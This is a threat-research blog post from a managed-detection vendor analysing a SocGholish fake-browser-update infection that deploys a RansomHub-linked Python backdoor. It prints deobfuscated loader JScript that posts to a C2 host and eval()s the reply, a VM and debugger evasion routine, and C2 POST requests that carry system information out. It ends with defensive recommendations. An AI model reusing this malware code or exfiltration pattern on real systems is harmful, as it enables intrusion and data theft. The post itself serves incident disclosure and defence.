eSentire is The Authority in Managed Detection and Response Services, protecting the critical data and applications of 2000+ organizations in 80+ countries from known and unknown cyber threats. Founded in 2001, the company’s mission is to hunt, investigate and stop cyber threats before they become business disrupting events.
We provide sophisticated cybersecurity solutions for Managed Security Service Providers (MSSPs), Managed Service Providers (MSPs), and Value-Added Resellers (VARs). Find out why you should partner with eSentire, the Authority in Managed Detection and Response, today.
Adversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters and Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.
We have discovered some of the most dangerous threats and nation state attacks in our space – including the Kaseya MSP breach and the more_eggs malware.
Our Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced Threat Analytics driven by our Threat Response Unit – the TRU team.
In TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We outline how we responded to the confirmed threat and what recommendations we have going forward.
Here’s the latest from our TRU Team…
What did we find?
In early March 2025, eSentire's Threat Response Unit (TRU) identified a cyberattack using SocGholish (also known as FakeUpdates) malware collecting system information and deploying a zip archive containing a python based backdoor connected to RansomHub affiliates.
RansomHub, which emerged in 2024, is a Ransomware-as-a-Service (RaaS) group that specializes in targeting high-profile organizations and advertises its criminal services on the Dark Web forum RAMP (Russian Anonymous Market Place). This blog examines the inner workings of the backdoor and SocGholish and demonstrates how threat actors strategically evaluate and select targets post-discovery.
Infection Chain
A simplified form of the infection chain can be seen in the figure below.
Figure 1 – Infection chain
Initial Access
Initial access began through the victim visiting a compromised WordPress site “butterflywonderland[.]com”, which displayed a page instructing the victim to update Microsoft Edge. The victim then downloaded the file, “Update.zip”, which contained the SocGholish JScript script file, “Update.js”.
The purpose of this script is to send a POST request to the SocGholish C2 at, “hxxps://exclusive.nobogoods[.]com/updateStatus”, in order to retrieve the next stage from the C2 and execute it via the eval() function.
The deobfuscated contents of this script can be seen below.
var a0_0x11d8eb = new ActiveXObject("MSXML2.XMLHTTP");
a0_0x11d8eb.open("POST", "https://exclusive.nobogoods[.]com/profileLayout", true);
a0_0x11d8eb.send("m29QO0a/f6CPLnKzgumo/nA1jnhP0S5dlEw1uB21Cw==");
while (true) {
WSH.Sleep(0x3e8);
if (a0_0x11d8eb.readyState == 0x4) {
eval(a0_0x11d8eb.responseText);
break;
}
}
Figure 2 – Deobfuscated snippet of Update.js
SocGholish then collected system information for discovery purposes, including the victim's domain, username, computer name, and processor architecture. This data was transmitted to the Command and Control (C2) server via HTTP POST requests.
The primary objective of this reconnaissance activity appears to be enabling threat actors to strategically select their targets while effectively evading security researchers and sandbox environments. All data sent to the C2 is URL-encoded.
POST /updateStatus
HTTP/1.1
Host: exclusive.nobogoods.com
Connection: keep-alive
ud=705DB984-9E64-5E92-5841-FA57CFEF8EC0%7C&it=eb1c77&s1tart=1&o1sBuildNumber=19045%7C&o1sCaption=Microsoft%20Windows%2010%20Enterprise%7C&u1serdnsdomain=&u1sername=&c1omputername=&p1roces
Figure 3 – Sending collecting system information
Executed the LOLBin net.exe to retrieve information about network connections and sent the information back to the C2 via HTTP POST.
cmd.exe /C net use > "C:\Users\user\AppData\Local\Temp\rad4EBD4.tmp"
Figure 4 – Usage of LOLBin net.exe
POST /updateStatus HTTP/1.1
Host: exclusive.nobogoods.com
Connection: keep-alive
task_cmd_result=1&task_id=98120&cmd_result=New%20connections%20will%20be%20remembered.%0D%0A%0D%0AThere%20are%20no%20entries%20in%20the%20list.%0D%0A%0D%0A&
Figure 5 – Send results of net use command to C2
Collected system information via the systeminfo command and sent it back to the C2 via HTTP POST.
The encryption key utilized to safeguard saved credentials/cookies/credit-cards and other sensitive data stored by Microsoft Edge and Chrome are then extracted via the following command and sent to the C2:
Figure 10 – Extract encryption key and unprotect via Unprotect method
The POST request below was then sent to the SocGholish C2 to retrieve the python backdoor. The delta between this request and SocGholish first contacting the C2 was approximately 6.5 minutes, indicating threat actors are casting a wide net and choosing targets post-discovery.
POST /updateStatus HTTP/1.1
Host: exclusive.nobogoods[.]com
Connection: keep-alive
Content-Length: 21
get_file=1&file_id=2027&
Figure 11 – Retrieve python backdoor
The following commands were then executed by SocGholish to rename, unpack, and execute the python backdoor via scheduled task. It is worth mentioning that the scheduled task is missing the argument to execute the backdoor script, suggesting perhaps the loading of the backdoor occurs automatically when pythonw.exe is launched by the task scheduler service.
The contents of the “python3.12” directory can be seen in the figure below. The file named “fcrapvim.pyz” is the obfuscated python backdoor. The backdoor makes use of several bundled dependencies that are imported, i.e. _socket.pyd, socket.pyd, select.pyd, and critical to the functionality of the backdoor.
Figure 12 – Directory listing of python backdoor directory
At the bottom of the obfuscated python backdoor, there is a very large string that is passed to a decryption routine “pc_start” and the return value returned by the “pc_start” function is invoked as python code via the exec() function.
Figure 13 – Call decryption routine (pc_start) and execute return value as python code via exec()
The figure below contains a truncated portion of the pc_start routine, which services two primary purposes, to decrypt the next stage, and to execute several evasive checks. First, the script checks the victim machine’s platform name for the substrings, “vm” or “virtual”.
If the substrings are found, the script exits. The remaining checks in this function determine if the process is being debugged, and if so the process exits or raises an uncaught exception.
def pc_start(enc):
import os, sys, platform, hashlib, uuid, time
import blake3
from Crypto.Cipher import AES as AESCipher
if any(x in platform.platform().lower() for x in ['vm', 'virtual']):
os._exit(1)
try:
with open('/proc/self/status') as f:
for line in f:
if line.startswith('TracerPid:') and int(line.split()[1]) != 0:
sys.exit(0)
except Exception:
pass
if '__debug__' in dir():
raise Exception()
Figure 14 – Decryption/evasion routine
The remaining code within this routine serves to decode and decrypt the large string passed through the parameter “enc”. The use of Base85 first to decode the string and inflation via ZLIB as a last step is consistent throughout stages, whereas the order of AES-256 (GCM), AES-128 (CTR), ChaCha20, and HKDF/Blake3/XOR varies between stages.
Base85
Each stage first converts the string passed to pc_start() to decrypt from Base85.
Consistently used as a first step in each stage.
AES-256 (GCM)
First 16 bytes is the salt.
Next 16 bytes is the nonce.
Next 16 bytes is the AES-GCM tag.
Random 12 alphabetical characters are used to derive key via PBKDF2 with the salt, key length is 256-bit.
Uses the generated key in AES-128 in GCM mode for decryption of the remaining bytes and verifies with the tag.
AES-128 (CTR)
First 16 bytes is the nonce, the remaining bytes are ciphertext.
Decrypt ciphertext via AES-128 in CTR mode with nonce.
ChaCha20
First 12 bytes is the nonce, remaining bytes are ciphertext.
Decrypt ciphertext via ChaCha20 with random key using nonce.
HKDF/Blake3/XOR
Generate HKDF key using random 32-byte salt, SHA256 as hash function.
Use Blake3 with HKDF-derived key, generates a hash of length equal to the input data (ciphertext).
XOR operation on each byte of ciphertext with corresponding byte of Blake3 hash.
ZLIB Inflation
Inflate ZLIB compressed bytes.
Consistently used as the last step in each stage.
The figure below contains a truncated portion of the second stage, where the next stage is decrypted via Base85 -> HKDF/Blake3/XOR -> AES-256 GCM -> ChaCha20 -> AES-128 CTR -> ZLIB Inflate.
Figure 15 – Decryption of stage N
A truncated portion of the final stage of the python backdoor can be seen below, which contains the threat actor(s) command server IP address, “38.146.28[.]93”. The backdoor processes connection commands received from the threat actors server, effectively allowing threat actors a SOCKS proxy to the internal (or external) networks. The IP address of the backdoor and TTPs discussed herein align with Trend Micro’s report.
Figure 16 – Python backdoor main function
The figure below shows the contents of the routine responsible for unpacking connection commands from the threat actor(s) server. This routine allows the server to request the client to connect to a designated target, such as an IP address or domain name, and proxy the traffic back, allowing threat actors to perform reconnaissance and lateral movement.
Figure 17 – start_transferring function, unpack/send connection, proxy traffic back to threat actor(s) server
What did we do?
Our team of 24/7 SOC Cyber Analysts proactively isolated the affected host to contain the infection on the customer’s behalf.
We communicated what happened with the customer and helped them with remediation efforts.
What can you learn from this TRU Positive?
RansomHub affiliates are using SocGholish for initial access and maintain persistence in networks via a python backdoor.
JScript files continue to be leveraged by SocGholish campaigns for Initial Access.
Security researchers can download the deobfuscated backdoor from VirusTotal here and use it to research adversary activities.
Recommendations from the Threat Response Unit (TRU):
Redirect the default Open With action of suspicious file extensions via GPO “User Configuration > Preferences > Control Panel > Settings” to a benign program like notepad.exe:
Right-click on Folder Options and navigate to New > Open With, type in the file extension to redirect and specify C:\Windows\notepad.exe.
Note, we recommend redirecting the following file extensions: js, jse, vbs, vbe, wsf, hta, and wsh.
Disable wscript.exe via AppLocker GPO or Windows Defender Application Control (WDAC):
C:\Windows\System32\WScript.exe
C:\Windows\Syswow64\WScript.exe
*:\Windows\System32\WScript.exe (* represents wildcard to include other drive letter rather than C drive)
*:\Windows\SysWOW64\WScript.exe (* represents wildcard to include other drive letter rather than C drive)
The use of obfuscation and sophisticated delivery mechanisms by malware underscores the importance of implementing comprehensive detection strategies, including script logging and behavior-based detection mechanisms, to identify and mitigate threats.
The eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your organization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7 Security Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and works as an extension of your security team to continuously improve our Managed Detection and Response service. By providing complete visibility across your attack surface and performing global threat sweeps and proactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending your organization against known and unknown threats.
Cookies allow us to deliver the best possible experience for you on our website - by continuing to use our website or by closing this box, you are consenting to our use of cookies. Visit our Privacy Policy to learn more.
